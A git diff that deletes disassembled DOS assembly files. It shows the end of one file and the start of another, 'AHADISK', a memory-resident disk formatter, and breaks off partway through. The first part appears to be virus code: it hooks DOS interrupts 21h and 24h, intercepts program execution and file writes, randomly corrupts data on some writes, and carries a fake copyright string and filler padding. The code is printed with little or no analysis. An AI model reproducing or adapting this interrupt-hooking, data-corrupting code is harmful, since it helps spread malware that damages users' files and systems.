- mov dx,70h - out dx,al ; port 70h, RTC addr/enabl NMI - mov dx,71h - in al,dx ; port 71h, RTC clock/RAM data - cmp al,0F0h - jbe loc_44 ; Jump if below or = - jmp loc_47 ; (057B) -loc_44: - mov ax,357Fh - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ax,ds - mov es,ax - cmp bx,0FFFFh - jne loc_45 ; Jump if not equal - jmp loc_48 ; (0582) -loc_45: - mov dx,0FFFFh - mov ax,257Fh - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov word ptr data_35,bx ; (936E:05E4=138Dh) - mov word ptr data_35+2,es ; (936E:05E6=28Ch) - mov ax,es - mov ds,ax - mov dx,bx - mov ax,257Eh - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,cs - mov es,ax - mov ds,ax - mov dx,offset int_21h_entry - mov ax,2521h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov word ptr data_37,bx ; (936E:05E8=4EBh) - mov word ptr data_37+2,es ; (936E:05EA=0A10h) - mov ax,es - mov ds,ax - mov dx,bx - mov ax,25FDh - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,cs - mov es,ax - mov ds,ax - mov dx,offset int_24h_entry - mov ax,2524h - mov ds:data_7e,dx ; (936E:0012=0) - mov ds:data_8e,ds ; (936E:0014=936Eh) - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - call sub_5 ; (0450) - call sub_4 ; (0410) - nop - nop - nop - nop - nop -loc_46: - mov cx,80h - mov di,data_47e ; (93CE:0600=41h) - mov si,data_5e ; (936E:0000=0) - cld ; Clear direction - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - mov ax,ds - add ax,60h - mov word ptr ds:[579h],ax ; (936E:0579=0E64h) - nop - nop - mov es,ax - mov ds,ax - pop ax - nop - nop -;* jmp far ptr loc_1 ;*(0E64:0100) - db 0EAh, 00h, 01h, 64h, 0Eh -loc_47: - mov dx,data_46e ; (93CE:05B0=41h) - mov ah,9 - int 21h ; 
DOS Services ah=function 09h - ; display char string at ds:dx -loc_48: - mov ax,4A00h - mov bx,5Fh - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov bx,ds:data_45e ; (93CE:002C=0FFFFh) - sub bx,1 - xor ax,ax ; Zero register - mov ds,bx - mov ds:data_48e,ax ; (FFFE:0001=0) - mov bx,cs - add bx,60h - mov dx,cs - sub dx,1 - mov ds,dx - mov ds:data_4e,bx ; (936D:0001=0FFFFh) - mov ah,50h ; 'P' - int 21h ; DOS Services ah=function 50h - ; set active PSP segmnt from bx - push cs - pop ds - jmp short loc_46 ; (0559) - db 'load error', 0Dh, 0Ah, '$' - db 0Ah, '$' - db 0 -data_20 db 'COMMAND.' -data_21 db 43h - db 4Fh, 4Dh, 00h -data_22 db 14h -data_23 db 6 ; Data table (indexed access) -data_24 db 0 ; Data table (indexed access) - db 4, 0 -data_25 dw 7BCh ; Data table (indexed access) -data_26 dw 701h ; Data table (indexed access) -data_27 dw 7BCh -data_28 dw 501h -data_29 db 0 -data_30 db 0FFh -data_31 dw 0A10h -data_32 dw 743h -data_33 dw 3D7Bh -data_34 dw 7B6Eh - db 90h -data_35 dd 28C138Dh -data_37 dd 0A1004EBh -data_39 dw 20h - db 90h, 90h, 4Dh, 10h, 0Ah,0FFh - db 0Fh - db 11 dup (90h) - db 0E9h,0CCh, 03h, 90h, 90h, 90h - db 90h, 90h, 9Ch, 50h, 31h,0C0h - db 2Eh, 38h, 26h,0DAh, 05h, 75h - db 07h -loc_49: - pop ax - popf ; Pop flags - jmp cs:data_37 ; (936E:05E8=4EBh) - cmp di,0 - jne loc_49 ; Jump if not equal - pop ax - popf ; Pop flags - mov ax,3 - iret ; Interrupt return - db 90h, 90h, 90h, 00h, 90h, 00h - db 0FFh,0FFh,0FFh,0FFh,0FFh, 9Ch - db 80h,0FCh, 4Eh, 75h, 02h,0EBh - db 1Ch, 80h,0FCh, 4Bh, 75h, 02h - db 0EBh, 15h -loc_50: - cmp ah,0Eh - jne loc_51 ; Jump if not equal - jmp short loc_53 ; (0654) -loc_51: - cmp ah,40h ; '@' - jne loc_52 ; Jump if not equal - jmp short loc_53 ; (0654) -loc_52: - popf ; Pop flags - jmp cs:data_35 ; (936E:05E4=138Dh) - db 90h -loc_53: - cli ; Disable interrupts - push es - push ds - push di - push si - push bp - push dx - push cx - push bx - push ax - mov cs:data_31,ss ; (936E:05DB=0A10h) - mov 
cs:data_32,sp ; (936E:05DD=743h) - mov al,0FFh - mov cs:data_30,al ; (936E:05DA=0FFh) - mov ax,3524h - int 7Eh ; ??INT Non-standard interrupt. - cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) - jne loc_54 ; Jump if not equal - mov ax,2524h - mov dx,108h - push cs - pop ds - int 7Eh ; ??INT Non-standard interrupt. -loc_54: - sti ; Enable interrupts - jmp short loc_56 ; (06AA) -loc_55: - cli ; Disable interrupts - xor ax,ax ; Zero register - mov cs:data_30,ah ; (936E:05DA=0FFh) - mov ss,cs:data_31 ; (936E:05DB=0A10h) - mov sp,cs:data_32 ; (936E:05DD=743h) - pop ax - pop bx - pop cx - pop dx - pop bp - pop si - pop di - pop ds - pop es - popf ; Pop flags - sti ; Enable interrupts - jmp cs:data_35 ; (936E:05E4=138Dh) - db 90h -loc_56: - pop ax - pop bx - push bx - push ax - cmp ah,4Bh ; 'K' - je loc_61 ; Jump if equal - cmp ah,40h ; '@' - jne loc_57 ; Jump if not equal - jmp short loc_60 ; (06CC) -loc_57: - cmp ah,0Eh - jne loc_58 ; Jump if not equal - jmp short loc_55 ; (0687) -loc_58: - cmp ah,4Eh ; 'N' - jne loc_55 ; Jump if not equal - jmp short loc_55 ; (0687) - db 90h -loc_59: - jmp loc_62 ; (0783) -loc_60: - mov ax,0Fh - cmp cs:data_29,al ; (936E:05D9=0) - jb loc_55 ; Jump if below - ja loc_59 ; Jump if above - cmp bx,4 - jbe loc_55 ; Jump if below or = - mov bx,1 - push cs - pop ds - add ds:data_11e,bx ; (936E:00FA=0) - mov ah,2Ch ; ',' - int 7Eh ; ??INT Non-standard interrupt. 
- cmp dh,ds:data_11e ; (936E:00FA=0) - ja loc_55 ; Jump if above - mov bx,data_3e ; (0A10:000E=1) - add bx,data_32 ; (936E:05DD=743h) - mov ss:[bx],bx - jmp short loc_55 ; (0687) - db 01h, 90h, 90h, 90h -loc_61: - jmp loc_63 ; (1A7F) - db 'Hello - Copyright S & S Internat' - db 'ional, 1990', 0Ah, 0Dh, '$' - db 1Ah, 41h, 41h - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAA' -loc_62: - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAA' -loc_63: - mov ah,9 - mov dx,offset data_14 ; (936E:0103=90h) - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - int 20h ; Program Terminate - -seg_a ends - - - - end start diff --git a/a/AHADISK (16).ASM b/a/AHADISK (16).ASM deleted file mode 100755 index 41a32c3..0000000 --- a/a/AHADISK (16).ASM +++ /dev/null 
@@ -1,4042 +0,0 @@ - -PAGE 59,132 - -; -; -; AHADISK -; -; Created: 29-Feb-92 -; Passes: 5 Analysis Options on: none -; -; - -data_1e equ 0 -data_2e equ 1 -data_3e equ 3 -data_4e equ 94h -keybd_flags_1_ equ 417h -dsk_recal_stat_ equ 43Eh -dsk_motor_stat_ equ 43Fh -dsk_motor_tmr_ equ 440h -video_mode_ equ 449h -video_port_ equ 463h -timer_low_ equ 46Ch -hdsk0_media_st_ equ 490h -data_16e equ 1000h ;* -data_17e equ 0 ;* -data_18e equ 3 ;* -data_234e equ 7C3Eh ;* - -;-------------------------------------------------------------- seg_a ---- - -seg_a segment byte public - assume cs:seg_a , ds:seg_a - - -; -; -; Program Entry Point -; -; - - -ahadisk proc far - -start: - jmp loc_262 -data_24 db 0, 0 -data_25 dw 0 -data_26 dw 0 -data_27 dw 0 -data_28 db 0 -data_29 db 0 -data_30 db 0 - db 0 -data_31 dw 1 -data_32 db 19h - db 0 -data_33 db ' ', 0 - db 27h, 0 - db '.', 0 - db ' 360 K', 0 - db ' 1.2 M', 0 - db ' 720 K', 0 - db '1.44 M', 0 -data_37 db 0FFh - db 11h,0FFh -data_38 db 1Dh - db 0FFh, 11h,0FFh, 23h -data_39 db 1 - db 0, 2, 0 -data_40 db 23h - db 00h, 3Bh, 00h, 23h, 00h, 47h - db 00h -data_41 db 2 - db 1, 2 -data_42 db 1 -data_43 db 0DFh - db 0DFh,0DFh,0AFh -data_44 db 9 - db 0Fh, 09h, 12h -data_45 db 2Ah - db 1Bh, 2Ah, 1Ah -data_46 db 50h - db 54h, 50h, 6Ch -data_47 db 0FDh - db 0F9h,0F9h,0F0h -data_48 db 70h - db 0 - db 0E0h, 00h - -locloop_2: - jo loc_3 ; Jump if overflow=1 -loc_3: - loopnz $+2 ; Loop if zf=0, cx>0 - - rol byte ptr [bp+si],1 ; Rotate - db 60h, 09h,0A0h, 05h, 40h, 0Bh -data_50 db 2 - db 0, 7, 0, 3, 0, 9 - db 0 -data_51 db 62h - db 01h, 43h, 09h,0C9h, 02h, 1Fh - db 0Bh -data_52 db 6 - db 1, 4, 3 -data_53 db 0 -data_54 dw 0 -data_55 db 0 -data_56 db 0 -data_57 db 2Ah -data_58 db 50h -data_59 db 0 -data_60 db 0, 0 -data_61 dw 0 -data_62 db 0 -data_63 db 0 -data_64 db 0 -data_65 db 0 -data_66 db 0 -data_67 dw 0 -data_68 dw 0 -data_69 db 0 -data_70 db 0 -data_71 db 0 -data_72 db 0 -data_73 db 0 -data_74 db 0 -data_75 db 0 -data_76 db 0 -data_77 db 0 
-data_78 db 0 -data_79 db 0 -data_80 db 0 -data_81 dw 130Dh -data_82 dw 0 -data_84 dw 0 -data_85 dw 0 -data_86 dw 0 -data_87 dw 0 -data_88 dw 0 -data_89 dw 0 -data_90 dw 0 -data_91 dw 0 -data_92 dw 0 -data_93 dw 0 -data_94 db 0 -data_95 db 0 -data_96 db 0Bh -data_97 db 0 -data_98 db 0, 0 -data_99 db 0 -data_100 dw 0 -data_101 db 0 -data_102 db 0 -data_103 db 0 -data_104 db 0 -data_105 dw 0 -data_106 dw 0 -data_107 db 0 -data_108 db 0 -data_109 db 0 -data_110 db 6 -data_111 db 0A0h -data_112 db 0 -data_113 db 0 - db 11 dup (0) -data_115 db 0 - db 9 dup (0) - -ahadisk endp - -; -; SUBROUTINE -; - -sub_2 proc near - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - 
add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+di],al - add [bx],cl - add [bx+di],al - add [bp+si],cl - add [si+0],ah -;* call sub_5 ;* - db 0E8h, 03h, 10h - daa ; Decimal adjust - mov al,byte ptr ds:[4086h] - inc dx - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - ja $+7 ; Jump if above - add [bx+si],al - add [bx+si],al - pop dx - xor ax,355Ah - pop dx - xor ax,577h - add [bx+si],al - -; External Entry into Subroutine - -sub_3: - add [bx+si],al - add [bx+si],al - add [bx+si],al - pop dx - xor ax,0 - add [bx+si],al - add [bx+si],al - pop dx - xor ax,0 - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - pop dx - xor ax,577h - pop dx - xor ax,0 - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add bh,dh -;* pop cs ; Dangerous 8088 only - db 0Fh -;* jo loc_4 ;*Jump if overflow=1 - db 70h,0FFh - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [di+6Eh],al - jz loc_5 ; Jump if zero - jc $+22h ; Jump if carry Set - inc sp - jc $+6Bh ; Jump if carry Set - jbe loc_6 ; Jump if below or = - and [si+6Fh],dl - and [bp+si+65h],al - and [bp+6Fh],al - jc $+6Fh ; Jump if carry Set - db 61h, 74h, 20h, 3Fh, 20h, 5Bh - db 'A' - db 5Dh, 00h - db 'Enter Drive Type ? (0 - 360K, 1 ' - db '- 1.2M) [0]' - db 0 - db 'Enter Drive Type ? 
(0 - 720K,' -loc_5: - and [bx+di],dh - and [di],ch - and [bx+di],dh -loc_6: - db '.44M) [0]' - db 0 - db 'Number Of Diskette To Be Format ' - db '(1-11) [' -data_182 dw 3131h - db 5Dh, 20h, 3Fh, 20h, 00h - db 'Insert New Diskette Into Drive ' -data_183 db 41h - db 0 - db 'Press ENTER To Start Format Or E' - db 'SC To Abort' - db 0 - db 'Can', 27h, 't Release From Memor' - db 'y, Interrupt Vector Address Been' - db ' Changed' - db 0 - db 'Press Any Key To Return To Main ' - db 'Menu' - db 0 - db 'No Format Report !' - db 00h, 00h, 00h, 00h, 00h, 2Dh - db 00h, 00h, 00h, 00h, 00h - db 43h, 70h -data_184 db 'HpApNpGpEpEpRpRpOpRp!pFpIpNpIpSp' - db 'Hp p p', 0 - db 'p', 0 - db 'p p pDisk Not Ready !', 0 - db 'Disk Write Protected !', 0 - db 'Seek Error !', 0 - db 'Abort or Retry ?', 0 - db 'Track 0 Bad, Diskette Unusable !' - db 0 - db 'Program Interrupted !', 0 - db 'Ready Printer, Press ENTER When ' - db 'Ready !', 0 - db 'Printing ....', 0 - db 'I/O Error !', 0 - db 'Printer Not Ready !', 0 - db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 13h, 20h,0ADh - db 'aHa/nBa!Mem Resident Format ' - db 1, 3 - db ' Version 6.9' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0CCh, 01h - db 4Eh,0CDh,0B9h,0BAh, 01h, 4Eh - db 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h - db 4Eh, 20h - db 0BAh,0C8h, 01h, 4Eh,0CDh,0BCh - db 01h, 87h,0D0h, 1Fh,0C9h, 01h - db 4Eh,0CDh,0BBh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 13h, 20h - db 0ADh - db 'aHa/nBa!Mem Resident Format ' - db 1, 3 - db ' 
Version 6.9' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0CCh, 01h - db 4Eh,0CDh,0B9h,0BAh, 01h, 1Ch - db 20h - db 0DAh, 01h, 15h,0C4h,0BFh, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0B3h - db ' Print Out ' - db 0ADh - db 'aHa/nBa! ' - db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh - db 01h, 1Ch, 20h,0C0h, 01h, 15h - db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh - db 0BAh, 01h, 1Ch, 20h,0DAh, 01h - db 15h,0C4h - db 0BFh, 01h, 1Bh, 20h,0BAh,0BAh - db 01h, 1Ch, 20h,0B3h, 01h, 04h - db ' Start format' - db 01h, 05h, 20h,0B3h, 01h, 1Bh - db 20h,0BAh,0BAh, 01h, 1Ch, 20h - db 0C0h, 01h, 15h,0C4h,0D9h, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0DAh, 01h, 15h,0C4h,0BFh - db 01h, 1Bh, 20h,0BAh,0BAh, 01h - db 1Ch, 20h,0B3h, 01h, 04h - db ' Format report' - db 01h, 04h, 20h,0B3h, 01h, 1Bh - db 20h,0BAh,0BAh, 01h, 1Ch, 20h - db 0C0h, 01h, 15h,0C4h,0D9h, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0DAh, 